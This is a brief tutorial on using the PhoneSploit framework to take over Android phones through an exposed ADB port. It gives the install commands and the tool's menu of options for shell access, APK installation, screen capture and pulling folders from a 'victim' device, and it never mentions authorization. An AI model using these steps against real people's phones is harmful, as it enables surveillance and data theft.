Hack Android with Phonesploit

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Phonesploit is a framework using which we can exploit android devices, It uses the ADB port 5555 to connect to a device and run commands on it. The tool is able to hack into android phones that have developer mode on and USB debugging enabled

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You should be having Kali Linux or Parrot OS

Step-1

Download and install the framework with following commands

apt install adb git clone https://github.com/aerosol-can/PhoneSploit cd PhoneSploit pip3 install colorama

```
(kali® kali)-[~]
$ git clone https://github.com/aerosol-can/PhoneSploit
Cloning into 'PhoneSploit'...
remote: Enumerating objects: 163, done.
remote: Counting objects: 100% (42/42), done.
remote: Compressing objects: 100% (36/36), done.
Receiving objects: 30% (50/163), 7.40 MiB | 648.00 KiB/s
```

Step-2

- Now fire up the framework
- python3 phonesploit.py



Step-3

Type in the IP address of the victim, once connected, use the options to attack the victim

```
[11] Uninstall an app
   Show Connected Devices
                               [6] Screen record a phone
   Disconect all devices
                               [7] Screen Shot a picture on a phone
                                                                      [12] Show real time log of device
                                                                       [13] Dump System Info
   Connect a new phone
                               [8] Restart Server
   Access Shell on a phone
                            [9] Pull folders from phone to pc
                                                                      [14] List all apps on a phone
[5] Install an apk on a phone
                               [10] Turn The Device off
                                                                       [15] Run an app
[99] Exit [0] Clear [p] Next Page
error: no devices/emulators found
List of devices attached
[+] Enter a phones ip address.(Type 99 to exit)
    phonesploit(connect phone) > 192.168.20.132
```

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THANKS